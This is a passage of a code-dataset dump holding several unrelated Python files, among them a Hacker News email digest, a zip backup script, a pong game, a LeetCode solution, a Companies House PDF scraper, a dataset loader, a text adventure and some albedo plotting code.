aug_config['noises_p'], 'snr': aug_config['noises_snrs']},\n \"spec_aug\": {\"time_mask_size\": aug_config[\"spec_aug_time_mask_size\"],\n \"freq_mask_size\": aug_config[\"spec_aug_freq_mask_size\"]},\n }\n\n\ndef explore(aug_config_new):\n for key, item in aug_config_new.items():\n #max_freq_mask_len=27, max_time_mask_len=100\n if key == \"spec_aug\":\n pass\n # if random.random() < 0.5:\n # # only doing resample for spec_aug\n # # item['time_mask_size'] = int(np.random.choice([50, 80, 120, 150], p=[0.25, 0.25, 0.25, 0.25]))\n # # item['freq_mask_size'] = int(np.random.choice([10, 15, 20, 25], p=[0.25, 0.25, 0.25, 0.25]))\n # item['time_mask_size'] = int(np.random.choice([30, 50, 70, 80], p=[0.25, 0.25, 0.25, 0.25]))\n # item['freq_mask_size'] = int(np.random.choice([10, 15, 20, 25], p=[0.25, 0.25, 0.25, 0.25]))\n else:\n inc_p = float(np.random.choice([0.0, 0.1, 0.15, 0.2, 0.25], p=[0.2, 0.2, 0.2, 0.2, 0.2]))\n inc_snr = int(np.random.choice([2, 3, 4, 5, 6], p=[0.2, 0.2, 0.2, 0.2, 0.2]))\n # amt = int(amt)\n if random.random() < 0.5:\n item['p'] = float(round(max(0, item['p'] - inc_p), 
3))\n # breakpoint()\n item['snr'] = int(max(0, item['snr'] - inc_snr))\n else:\n item['p'] = float(round(max(0, item['p'] + inc_p), 3))\n # breakpoint()\n item['snr'] = int(max(0, item['snr'] + inc_snr))\n\n if item['p'] < 0:\n item['p'] = 0\n elif item['p'] > 1:\n item['p'] = 1\n\n if item['snr'] < 0:\n item['snr'] = 0\n\n\nif __name__ == '__main__':\n aug_config_old = {\n 'reverb_p': 0.2,\n 'music_p': 0.2,\n 'noises_p': 0.2,\n 'overlap_p': 0.2,\n 'music_snrs': 5,\n 'overlap_snrs': 10,\n 'noises_snrs': 15,\n }\n new_config = convert2new(aug_config_old)\n print(new_config)\n old_config = convert2old(new_config)\n print(old_config)\n new_config = convert2new(old_config)\n explore(new_config)\n print(new_config)\n","sub_path":"pba/new_explore.py","file_name":"new_explore.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"368018268","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\n# Import smtplib for the actual sending function\nimport smtplib\n\n# Import the email modules we'll need\nfrom email.mime.text import MIMEText\n\nbase_url = 'https://hacker-news.firebaseio.com'\nstories_file = 'stories.txt'\nmails_file = 'sendingto.txt'\nsending_mail = ''\nwith open(stories_file) as f:\n meanwhile_stories = f.read().splitlines()\nwith open(mails_file) as f:\n mails = f.read().splitlines()\n\ncurrent_mail = ''\n\nfor s in meanwhile_stories:\n try:\n story = requests.get(base_url + '/v0/item/'+str(s)+'.json').json()\n print('add story :{0}'.format(str(s)))\n msg = \"\"\n if 'url' in story:\n msg = str(s) + ' - ' + story['title'] + ' - ' + story['url'] + ' comments : https://news.ycombinator.com/item?id='+ str(s) +' \\n'\n print(msg)\n else:\n msg = str(s) + ' - ' + story['title'] + ' comments : https://news.ycombinator.com/item?id='+ str(s) + '\\n'\n print(msg)\n current_mail+=msg\n except:\n print(\"Error for \"+str(s))\nprint('=================')\nif current_mail != \"\":\n for mail in mails:\n try:\n if mail != \"\":\n print(mail)\n email = MIMEText(current_mail)\n email['Subject'] = \"HN News Recap\"\n email['From'] = sending_mail \n email['To'] = mail\n s = smtplib.SMTP(\"localhost\");\n s.sendmail(sending_mail, mail ,email.as_string())\n s.quit()\n print(\"Mail sent\")\n except Exception as e:\n print(\"Error for :\"+mail+\" \"+str(e));\n\n \nwith open(stories_file, 'w') as f:\n\tf.write('')\n\n","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"255042422","text":"#!/usr/bin/env python3\n#file-name: bak_3.py\n\nimport os\nimport time\n\nsource = ['/home/bocyn/Документы']\ntarget_dir = '/home/bocyn/Dropbox/Backup'\ntoday = target_dir+os.sep+time.strftime('%Y%m%d')\nnow = time.strftime('%H%M%S')\n\nif not os.path.exists(today):\n\tos.mkdir(today)\n\ncomment = input('Enter a comment-->')\n\nif len(comment) == 0:\n\ttarget = today+os.sep+now+'.zip'\nelse:\n\ttarget = today+os.sep+now+'_'+comment.replace(' ', '_')\n\nzip_command = \"zip -qr {0} {1}\".format(target, ' '.join(source))\n\nif os.system(zip_command) == 0:\n\tprint('Backup created in', today)\nelse:\n\tprint('ERROR')\n","sub_path":"bak_3.py","file_name":"bak_3.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"159846709","text":"import 
pygame\r\n\r\n\r\npygame.init()\r\n\r\nDISPLAY_WIDTH = 800\r\nDISPLAY_HEIGHT = 600\r\n\r\n# Color definitions\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\n\r\nDISPLAY = pygame.display.set_mode((DISPLAY_WIDTH,DISPLAY_HEIGHT))\r\npygame.display.set_caption(\"A really stupid pong game\")\r\nclock = pygame.time.Clock()\r\npygame.font.init()\r\nFONT = pygame.font.SysFont('Arial', 30)\r\n\r\nclass Ball(pygame.sprite.Sprite):\r\n def __init__(self, x, y):\r\n super().__init__()\r\n\r\n self.image = pygame.Surface((15,15))\r\n self.image.fill(BLACK)\r\n self.rect = self.image.get_rect()\r\n self.rect.centerx = DISPLAY_WIDTH / 2\r\n self.rect.centery = DISPLAY_HEIGHT / 2\r\n self.x_vel = 5\r\n self.y_vel = 5\r\n self.touching_paddle = False\r\n\r\n def update(self):\r\n self.rect.x += self.x_vel\r\n\r\n if self.rect.x < 0 or self.rect.x > DISPLAY_WIDTH - self.rect.width:\r\n self.rect.x = min(max(0, self.rect.x), DISPLAY_WIDTH - self.rect.width)\r\n self.x_vel = -self.x_vel\r\n\r\n self.rect.y += self.y_vel\r\n\r\n if self.rect.y < 0:\r\n self.rect.y = min(max(0, self.rect.y), DISPLAY_HEIGHT - self.rect.width)\r\n self.y_vel = -self.y_vel\r\n \r\n if self.rect.y > DISPLAY_HEIGHT - self.rect.width:\r\n global Game_Over\r\n Game_Over = True\r\n \r\n if pygame.sprite.collide_rect(self, paddle):\r\n if not self.touching_paddle:\r\n self.y_vel = -self.y_vel\r\n self.touching_paddle = True\r\n global Score\r\n Score += 1\r\n else: self.touching_paddle = False\r\n \r\n\r\nclass Paddle(pygame.sprite.Sprite):\r\n def __init__(self):\r\n\r\n super().__init__()\r\n\r\n self.image = pygame.Surface((100,15))\r\n self.image.fill(BLACK)\r\n self.rect = self.image.get_rect()\r\n self.rect.centerx = DISPLAY_WIDTH / 2\r\n self.rect.y = DISPLAY_HEIGHT - 50\r\n\r\n self.x_vel = 0\r\n \r\n def change_speed(self, speed):\r\n self.x_vel += speed\r\n \r\n def update(self):\r\n self.x_vel *= 0.8\r\n if abs(self.x_vel) < 0.5: self.x_vel = 0\r\n self.rect.x += self.x_vel\r\n\r\n if self.rect.x < 0 or self.rect.x > DISPLAY_WIDTH - self.rect.width:\r\n self.rect.x = min(max(0, self.rect.x), DISPLAY_WIDTH - self.rect.width)\r\n\r\ndef draw_text(text, x, y):\r\n DISPLAY.blit(FONT.render(text, False, (0, 0, 0)), (x,y))\r\n\r\ndef draw():\r\n DISPLAY.fill(WHITE)\r\n sprites.draw(DISPLAY)\r\n if Score > 0: draw_text(str(Score), 10, 10)\r\n\r\nsprites = pygame.sprite.Group()\r\nball = Ball(0,0)\r\npaddle = Paddle()\r\nsprites.add(paddle)\r\nsprites.add(ball)\r\n\r\ndef game_loop():\r\n global Game_Over, Score\r\n Game_Over = False\r\n Score = 0\r\n right = left = False\r\n while not Game_Over:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n right = True\r\n elif event.key == pygame.K_RIGHT:\r\n left = True\r\n\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT:\r\n right = False\r\n elif event.key == pygame.K_RIGHT:\r\n left = False\r\n \r\n if left:\r\n paddle.change_speed(5)\r\n if right:\r\n paddle.change_speed(-5)\r\n \r\n sprites.update()\r\n \r\n draw()\r\n pygame.display.update()\r\n clock.tick(60)\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n \r\n clock.tick(60)\r\n\r\ngame_loop()\r\npygame.quit()\r\nquit()","sub_path":"archive/Pygame/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"619662687","text":"#\n# @lc app=leetcode.cn id=859 lang=python3\n#\n# [859] 亲密字符串\n#\n\n# @lc code=start\nclass Solution:\n def buddyStrings(self, A: str, B: str) -> bool:\n if len(A)!=len(B):\n return False\n if A==B:\n return len(A) != len(set(A))\n first = second = None\n for index in range(len(A)):\n if A[index] != B[index]:\n if first is not None and second is not None:\n return False\n elif first is not None:\n if A[first] == B[index] and B[first] == A[index]:\n second = index\n continue\n else:\n first = index\n return bool(second)\n def buddyStrings(self, A: str, B: str) -> bool:\n if len(A)!=len(B):\n return False\n if A==B:\n return len(A) != len(set(A))\n diffs = []\n for index in range(len(A)):\n if A[index] != B[index]:\n diffs.append(index)\n if len(diffs) != 2:\n return False\n i, j = diffs\n return A[i] == B[j] and B[i]==A[j]\n\n\n\n\n\n# @lc code=end\n\n","sub_path":"859.亲密字符串.py","file_name":"859.亲密字符串.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"68162719","text":"\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 18 13:27:15 2021\n\n@author: yp229\n\"\"\"\n\nimport pdfkit\nimport os\nfrom bs4 import BeautifulSoup as bs\nfrom urllib.request import urlopen,Request\n\nos.getcwd()\n#path = 'Desktop/print_to_pdf/'\n#os.makedirs(path)\n\npath_htmltopdf = r'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'\n\nconfig = pdfkit.configuration(wkhtmltopdf = path_htmltopdf)\n\n\n#company = \"12549701\"\n\ncompany = input(\"Enter Company Number: \")\n\nurl = \"https://find-and-update.company-information.service.gov.uk/company/\" + str(company) + \"/\"\nuser_agent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46'\nclient = urlopen(Request(str(url), data=None, headers={'User-Agent': user_agent}))\nhtml=client.read()\nclient.close()\nsoup=bs(html,\"html.parser\")\n\nCompany_Name=soup.find(\"div\",{\"class\":\"company-header\"}).find(\"p\").text\nprint(\"\\n\" + Company_Name + \"\\n\")\ncontainer=soup.findAll(\"div\",{\"class\":\"section-tabs js-tabs\"})\n\np = 'Desktop/' + str(Company_Name) + '/'\ntry:\n os.makedirs(p)\nexcept FileExistsError:\n print(\"Folder exists already\\n\")\n\n\nall_linker = container[0].findAll('li')\n\n\nfor i in all_linker:\n \n pdf_name = i.find('a').text.split('for')[0].strip()\n link = i.find('a')['href']\n \n try:\n l = \"https://find-and-update.company-information.service.gov.uk\" + str(link) \n \n #Printing twwo pages of people if it has\n if pdf_name==\"People\":\n \n client = urlopen(Request(str(l), data=None, headers={'User-Agent': user_agent}))\n html=client.read()\n client.close()\n soup_2=bs(html,\"html.parser\")\n container_2=soup_2.findAll(\"ul\",{\"class\":\"search-tabs\"})[0].findAll('li')\n \n if len(container_2)>1:\n pdf_name = pdf_name + \" Officers\"\n path = \".\\\\Desktop\\\\\" + str(Company_Name) + \"\\\\\" + str(pdf_name) +\".pdf\"\n pdfkit.from_url(l,path,configuration = config)\n link_2 = container_2[1].find('a')['href']\n l_2 = \"https://find-and-update.company-information.service.gov.uk/\" + str(link_2) \n pdf_name = pdf_name + \" PWSC\"\n path = \".\\\\Desktop\\\\\" + str(Company_Name) + \"\\\\\" + str(pdf_name) +\".pdf\"\n pdfkit.from_url(l_2,path,configuration = config)\n\n\n \n else:\n path = \".\\\\Desktop\\\\\" + str(Company_Name) + \"\\\\\" + str(pdf_name) +\".pdf\"\n pdfkit.from_url(l,path,configuration = config)\n \n \n except:\n next","sub_path":"PDF 
DOWNLOAD/Test_1.py","file_name":"Test_1.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"280315694","text":"import time\nfrom os.path import join as pjoin\nfrom pathlib import Path\nfrom utils.util import memcache\nfrom base.base_dataset import BaseDataset\n\n\nclass ActivityNet(BaseDataset):\n\n def configure_train_test_splits(self, split_name):\n train_list_path = \"train_list.txt\"\n if split_name == \"val1\":\n test_list_path = \"val_1_list.txt\"\n raw_caps_name = \"raw-captions-train-val_1.pkl\"\n elif split_name == \"val2\":\n test_list_path = \"val_2_list.txt\"\n raw_caps_name = \"raw-captions-train-val_2.pkl\"\n else:\n raise ValueError(f\"Unrecognised activity-net split: {split_name}\")\n\n train_list_path = pjoin(self.root_feat, train_list_path)\n test_list_path = pjoin(self.root_feat, test_list_path)\n self.raw_captions_path = Path(self.root_feat) / raw_caps_name\n\n print(\"loading training/val splits....\")\n tic = time.time()\n with open(train_list_path) as f:\n self.train_list = f.readlines()\n self.train_list = [x.strip() for x in self.train_list]\n with open(test_list_path) as f:\n self.test_list = f.readlines()\n self.test_list = [x.strip() for x in self.test_list]\n print(\"done in {:.3f}s\".format(time.time() - tic))\n self.split_name = split_name\n\n def load_features(self):\n root_feat = self.root_feat\n feat_names = {\n \"face\": \"VGGFace2-ResNet50-face-avg.pickle\",\n \"flow\": \"i3d-i3d-avg.pickle\",\n \"rgb\": f\"{self.rgb_model_name}-imagenet-avg-nocrop.pickle\",\n \"scene\": \"densenet161-scene-max.pickle\",\n \"ocr\": \"AN_OCR_ALL_unique_video_w2v.pkl\",\n \"audio\": \"vggish-audio-raw.pickle\",\n \"speech\": \"stt_w2v.pickle\",\n }\n feat_paths = {key: Path(root_feat) / value for key, value in feat_names.items()}\n\n if self.text_feat == \"openai\":\n text_feat_train_path = pjoin(root_feat, \"openai-train.pkl\")\n text_feat_val1_path = pjoin(root_feat, \"openai-val1.pkl\")\n text_feat_val2_path = pjoin(root_feat, \"openai-val2.pkl\")\n else:\n raise ValueError(f\"Text features {self.text_feat} not supported \")\n\n features = {expert: memcache(path) for expert, path in feat_paths.items()}\n text_features = memcache(text_feat_train_path)\n if self.split_name == \"val1\":\n text_features.update(memcache(text_feat_val1_path))\n elif self.split_name == \"val2\":\n text_features.update(memcache(text_feat_val2_path))\n else:\n raise ValueError(f\"unrecognised activity-net split: {self.split_name}\")\n\n self.features = features\n self.text_features = text_features\n self.raw_captions = memcache(self.raw_captions_path)\n\n def sanity_checks(self):\n msg = (f\"Expected to have single test caption for ANet, since we assume\"\n f\"that the captions are fused (but using {self.num_test_captions})\")\n assert self.num_test_captions == 1, msg\n","sub_path":"data_loader/ActivityNet_dataset.py","file_name":"ActivityNet_dataset.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"246623671","text":"import world, items, display, os\nfrom player import Player\n\ndef play():\n world.load_tiles()\n player = Player()\n # Display introduction to game\n intro()\n # These lines load the starting room and display the text\n room = world.tile_exists(player.location_x, player.location_y)\n display.slow_print(room.intro_text())\n while player.is_alive() and not player.victory:\n # Check if 
player has all generator pieces\n generatorPiecesObtained = 0\n for item in player.inventory:\n if item.name == items.GeneratorPart1(0).name:\n generatorPiecesObtained += 1\n elif item.name == items.GeneratorPart2(0).name:\n generatorPiecesObtained += 1\n elif item.name == items.GeneratorPart3(0).name:\n generatorPiecesObtained += 1\n player.generatorPiecesObtained = generatorPiecesObtained\n\n room = world.tile_exists(player.location_x, player.location_y)\n room.modify_player(player)\n\n # Check again since the room could have changed the player's state\n if player.is_alive() and not player.victory:\n display.slow_print(\"Jack's HP: {}\".format(player.hp))\n display.slow_print(\"Generator Parts Obtained: {}\".format(player.generatorPiecesObtained))\n display.slow_print(\"\\nHilda, what should I do?\\n\")\n available_actions = room.available_actions()\n for action in available_actions:\n print(action)\n action_input = input('\\nAction: ')\n for action in available_actions:\n if action_input.upper() == action.hotkey:\n player.do_action(action, **action.kwargs)\n break\n elif player.hp == 0:\n display.slow_print(\"\"\"\n Jack feels numb and can no longer move his body. His vision blurs as he falls.\n \"\"\")\n\n display.slow_print(\"\"\"\n Game Over\n \"\"\")\n return\n\ndef intro():\n display.slow_print(\"\"\"\n ---------------------\n | End of the Tunnel |\n | A Text Adventure Game |\n ---------------------\n\n\n In an alternate 1830’s industrial revolution, our world was \n hit by a brutal ice age. In order for people to survive, they had to \n relocate to the underground tunnels and catacombs. Although \n people banded together for their survival, a caste system formed \n between those who could afford to bring machinery and resources \n and those who could not. Upper class citizens had access to \n basic necessities and lived lavishly, while the lower class were \n farmers who lived in disease-filled conditions.\n\n Our story begins with a man named Jack Hill, a lower class citizen \n and mechanic of the power generator providing heat for his \n underground colony. Jack lost his wife, Hilda, a servant \n for an upper class noble, a month ago due to poor working conditions. \n Devastated and without any friends, Jack begins talking to himself \n as if Hilda never left him. One day, Jack wakes up to his town in disarray. \n As Jack makes his way to the Town Hall, he learns that someone has sabotaged \n the generator and three pieces are missing. Now Jack has to recover the \n pieces before he and the town die without a heat source. 
\n \"\"\")\n\nif __name__ == \"__main__\":\n play()","sub_path":"IST446_Intro_to_Building_Computer_Games/EndOfTheTunnelTextAdventure/TextAdventure/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"419704974","text":"import numpy as np\nimport random\n\nclass SM_alg():\n \"\"\" \n Calculate pi using direct sampling monte carlo algorithms\n \"\"\"\n def __init__(self,N):\n self.N = N\n self.Nhits = 0\n def direct_sampling(self):\n\n x = np.random.uniform(-1, 1, self.N)\n y = np.random.uniform(-1, 1, self.N)\n\n for i,j in np.nditer([x,y]):\n if (i*i) + (j*j) < 1:\n self.Nhits = self.Nhits + 1\n \n def markov_pi(self,x_markov,y_markov,delta):\n \"\"\"Pi comes out as four times the ratio of hits\n to trials \n \"\"\"\n self.x_markov = x_markov\n self.y_markov = y_markov\n self.delta = delta\n\n deltax = np.random.uniform(-self.delta, self.delta, self.N)\n deltay = np.random.uniform(-self.delta, self.delta, self.N)\n\n for i,j in np.nditer([deltax,deltay]): \n if np.absolute(self.x_markov + i) < 1 and np.absolute(self.y_markov + j) < 1:\n\n self.x_markov = self.x_markov + i\n self.y_markov = self.y_markov + j \n\n if (self.x_markov * self.x_markov) + (self.y_markov * self.y_markov) < 1:\n self.Nhits = self.Nhits + 1 \n","sub_path":"direct_pi.py","file_name":"direct_pi.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"5445683","text":"import albedo._albedo.setaxes as setaxes\n#import _albedo.setaxes as setaxes\nimport param\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg\nfrom matplotlib.figure import Figure\n\nimport numpy as np\nfrom datetime import datetime, timedelta\n\nimport pandas as pd\n\nclass PlotMethods(setaxes.SetAxes):\n \n @param.depends('run_state', 'date', 'elev', 'choose3d')\n def axes3d(self, figsize=(6,6), topMargin=1.2, bottomMargin=0):\n if self.run_state == True:\n pass\n else:\n plt.close()\n fig = plt.figure(figsize=figsize)\n ax = fig.add_subplot(111, projection='3d')\n\n if self.choose3d:\n if 'Raw Lidar' in self.choose3d:\n xyz = self.datetime2xyz(choice='raw')\n Easting, Northing, Elevation = xyz[:,0], xyz[:,1], xyz[:,2]\n ax.scatter(Easting, Northing, Elevation,\n cmap='viridis', c=Elevation)\n \n if 'Pointcloud' in self.choose3d:\n xyz = self.datetime2xyz(choice='pointcloud')\n Easting, Northing, Elevation = xyz[:,0], xyz[:,1], xyz[:,2]\n ax.scatter(Easting, Northing, Elevation,\n cmap='viridis', c=Elevation)\n\n if 'Planar Fit' in self.choose3d:\n XYZ = self.pFit()\n X, Y, Z = XYZ[:,:,0], XYZ[:,:,1], XYZ[:,:,2]\n ax.plot_surface(X, Y, Z, color='r', \n rstride=1, cstride=1, alpha=0.4)\n\n ax.view_init(elev=self.elev, azim=self.azim)\n ax.set_xlim(320977, 320980)\n ax.set_xlabel('Easting')\n ax.set_ylim(4168144, 4168147)\n ax.set_ylabel('Northing')\n ax.set_zlim(2941.977, 2948.356)\n ax.set_zlabel('Elevation')\n plt.subplots_adjust(top=topMargin, bottom=bottomMargin) \n plt.close()\n return fig\n \n @param.depends('date', 'resolution', 'sigma', 'time', 'activateMask')\n def triptych(self, figsize=(12,5), wspace=0.05, hspace=0, leftMargin=0.05, \n rightMargin=0.97, topMargin=0.79, bottomMargin=0.1):\n plt.close()\n fig, ax = plt.subplots(1,3, figsize=figsize, dpi=self.dpi)\n canvas = FigureCanvasAgg(fig)\n\n ds = self.date_string\n line2 = f'\\nR, S 
={(self.resolution,self.sigma)}'\n\n titles = [f'{ds}: Elevation'+line2, f'{ds}: Slope'+line2,\n f'{ds}: Aspect (South=0, East +)'+line2]\n\n if self.activateMask == 'Overlay':\n imgs = [self.masked_elev, self.masked_slope, self.masked_aspect]\n elif self.activateMask == 'Remove':\n imgs = [self.elevRast, self.slopeRast, self.aspectRast]\n\n cmaps = ['viridis', 'YlOrBr', 'hsv']\n cmapRanges = [(np.min(self.elevRast), np.max(self.elevRast)),\n (np.min(self.slopeRast), np.max(self.slopeRast)),\n (-180, 180)]\n\n ticks = np.linspace(0, self.resolution-1, 4)\n xlabels = [str(self.eastMin)[-2:], str(self.eastMin+1)[-2:],\n str(self.eastMin+2)[-2:], str(self.eastMax)[-2:]]\n ylabels = [str(self.northMin)[-2:], str(self.northMin+1)[-2:],\n str(self.northMin+2)[-2:], str(self.northMax)[-2:]]\n\n ims = []\n for i in range(3):\n img, cmap = imgs[i], cmaps[i]\n im = ax[i].imshow(img, origin='lower', cmap=cmap,\n vmin=cmapRanges[i][0], vmax=cmapRanges[i][1])\n ims.append(im)\n ax[i].set_xticks(ticks=ticks)\n ax[i].set_xticklabels(labels=xlabels)\n ax[i].set_yticks(ticks=ticks)\n if i == 0:\n ax[i].set_yticklabels(labels=ylabels)\n ax[i].set_ylabel(f'Northing (+{str(self.northMin)[:-2]}e2)')\n else:\n ax[i].set_yticklabels(labels=[])\n if i == 1:\n ax[i].set_xlabel(f'Easting (+{str(self.eastMin)[:-2]}e2)')\n ax[i].set_aspect(\"equal\")\n\n plt.subplots_adjust(left=leftMargin, right=rightMargin,\n top=topMargin, bottom=bottomMargin,\n wspace=wspace, hspace=hspace)\n\n for i in range(3):\n p = ax[i].get_position().get_points().flatten()\n ax_cbar = fig.add_axes([p[0], 0.85, p[2]-p[0], 0.05])\n ax_cbar.set_title(titles[i], loc='left')\n cb = plt.colorbar(ims[i], cax=ax_cbar, orientation='horizontal')\n if i == 2:\n cbar_ticks = [-180, -135, -90, -45, 0, 45, 90, 135, 180]\n cb.set_ticks(cbar_ticks)\n\n if self.run_state == True:\n canvas.draw() # Retrieve a view on the renderer buffer\n buf = canvas.buffer_rgba()\n X = np.asarray(buf) # convert to a NumPy array\n plt.close()\n return X\n else:\n plt.close()\n return fig\n \n @param.depends('date', 'time', 'bins')\n def polarAxes(self, figsize=(3.5,5), topMargin=1, bottomMargin=0,\n leftMargin=0.1, rightMargin=0.92):\n \n df = self.dataframe\n\n plt.close()\n fig = plt.figure(figsize=figsize, dpi=self.dpi)\n canvas = FigureCanvasAgg(fig)\n \n ax = fig.add_subplot(111, projection='polar')\n ax.set_theta_zero_location('N')\n ax.set_xticks(([np.deg2rad(0), np.deg2rad(45), np.deg2rad(90),\n np.deg2rad(135), np.deg2rad(180), np.deg2rad(225),\n np.deg2rad(270), np.deg2rad(315)]))\n xlbls = np.array(['N','45','E','135','S','225','W','315'])\n ax.set_xticklabels(xlbls, rotation=\"vertical\", size=12)\n ax.tick_params(axis='x', pad = 0.5)\n ax.set_theta_direction(-1)\n ax.set_rmin(0)\n ax.set_rmax(90)\n ax.set_rlabel_position(90)\n \n if self.bins != 'Max':\n col = df['bin_assignment']\n xs = [np.deg2rad(self.angle_dict[entry]) for entry in col]\n x = np.deg2rad(self.angle_dict[col.iloc[self.time]])\n else:\n col = df['solarAzimuth']\n xs = np.deg2rad(col)\n x = np.deg2rad(col.iloc[self.time])\n\n ys = df['solarAltitude']\n y = df['solarAltitude'].iloc[self.time]\n\n ax.scatter(xs,ys, s=10, c='orange',alpha=0.5)\n ax.scatter(x, y, s=500, c='gold',alpha=1)\n \n self.dt_str = df['MeasDateTime'].iloc[self.time]\n line1=f'{self.dt_str} Sun Position'\n line2=f'Azi, SZA={np.around((np.rad2deg(x),y),1)}, Bins={self.bins}'\n\n plt.subplots_adjust(top=topMargin, bottom=bottomMargin,\n left=leftMargin, right=rightMargin)\n\n p = ax.get_position().get_points().flatten()\n 
ax_cbar = fig.add_axes([p[0]+0.085, 0.85, p[2]-p[0], 0.05])\n ax_cbar.set_title(line1+'\\n'+line2, loc='left')\n ax_cbar.axis('off')\n\n if self.run_state == True:\n canvas.draw() # Retrieve a view on the renderer buffer\n buf = canvas.buffer_rgba()\n X = np.asarray(buf) # convert to a NumPy array\n plt.close()\n return X\n else:\n plt.close()\n return fig\n \n @param.depends('date', 'resolution', 'sigma', 'time', 'activateMask')\n def diptych(self, figsize=(8.25,5), topMargin=0.85, bottomMargin=0.05,\n leftMargin=0.095, rightMargin=0.95, wspace=0.1, hspace=0):\n '''\n generates and plots a 'magma' themed M raster and \n the direct rad shade mask for the given date & time\n '''\n plt.close()\n fig, ax = plt.subplots(1,2, figsize=figsize, dpi=self.dpi)\n \n canvas = FigureCanvasAgg(fig)\n\n line2 = f'\\nR, S, B={(self.resolution,self.sigma,self.bins)}'\n title1 = f'{self.dt_str}: Terrain Correction'+line2\n title2 = f'{self.dt_str}: Current Visibility'+line2\n titles = [title1, title2]\n\n if self.activateMask == 'Overlay':\n imgs = [self.masked_m, self.mask]\n elif self.activateMask == 'Remove':\n imgs = [self.m, self.mask]\n\n cmaps = ['magma', 'binary']\n cmapRanges = [(0,2), (0, 1)]\n\n ticks = np.linspace(0, self.resolution-1, 4)\n xlabels = [str(self.eastMin)[-2:], str(self.eastMin+1)[-2:],\n str(self.eastMin+2)[-2:], str(self.eastMax)[-2:]]\n ylabels = [str(self.northMin)[-2:], str(self.northMin+1)[-2:],\n str(self.northMin+2)[-2:], str(self.northMax)[-2:]]\n\n ims = []\n for i in range(2):\n img, cmap = imgs[i], cmaps[i]\n im = ax[i].imshow(img, origin='lower', cmap=cmap,\n vmin=cmapRanges[i][0], vmax=cmapRanges[i][1])\n ims.append(im)\n ax[i].set_xticks(ticks=ticks)\n ax[i].set_xticklabels(labels=xlabels)\n ax[i].set_yticks(ticks=ticks)\n if i == 0:\n ax[i].set_yticklabels(labels=ylabels)\n ax[i].set_ylabel(f'Northing (+{str(self.northMin)[:-2]}e2)')\n else:\n ax[i].set_yticklabels(labels=[])\n if i == 0:\n ax[i].set_xlabel(f'Easting (+{str(self.eastMin)[:-2]}e2)')\n ax[i].set_aspect(\"equal\")\n\n plt.subplots_adjust(left=leftMargin, right=rightMargin,\n top=topMargin, bottom=bottomMargin,\n wspace=wspace, hspace=hspace)\n\n for i in range(2):\n p = ax[i].get_position().get_points().flatten()\n ax_cbar = fig.add_axes([p[0], 0.85, p[2]-p[0], 0.05])\n ax_cbar.set_title(titles[i], loc='left')\n cb = plt.colorbar(ims[i], cax=ax_cbar, orientation='horizontal')\n if i == 1:\n cb.set_ticks([0, 1])\n cb.set_ticklabels([\"Visible\", \"Shaded\"])\n \n if self.run_state == True:\n canvas.draw() # Retrieve a view on the renderer buffer\n buf = canvas.buffer_rgba()\n X = np.asarray(buf) # convert to a NumPy array\n plt.close()\n return X\n else:\n plt.close()\n return fig\n \n def timeSeries_Plot(self, df, mx):\n '''\n plots a time series, given set of times and a tuple of y's.\n '''\n plt.close()\n #figure and three axes\n fig, ax_rad = self.fig, self.ax\n \n canvas = FigureCanvasAgg(fig)\n \n ax_m, ax_alpha, ax_viz = self.par1, self.par2, self.par3\n\n #setting up the plot title\n t_dict = self.param.time.names\n sunrise_sunset = f'({list(t_dict)[0]}-{list(t_dict)[-1]})'\n line1 = f'{self.date_string} {sunrise_sunset};'\n line2 = f' R, S, B={[self.resolution,self.sigma,self.bins]}'\n title = line1+line2\n ax_rad.set_title(title, loc='left', fontsize=12)\n\n #x-axis vals (in UTC) & labels (in PT)\n times = df['UTC_datetime'] - timedelta(hours=self.UTC_offset)\n time_labels = [t.strftime(\"%H:%M\") for t in times]\n time_labels[0] = ''\n ax_rad.set_xticks(times[::4])\n 
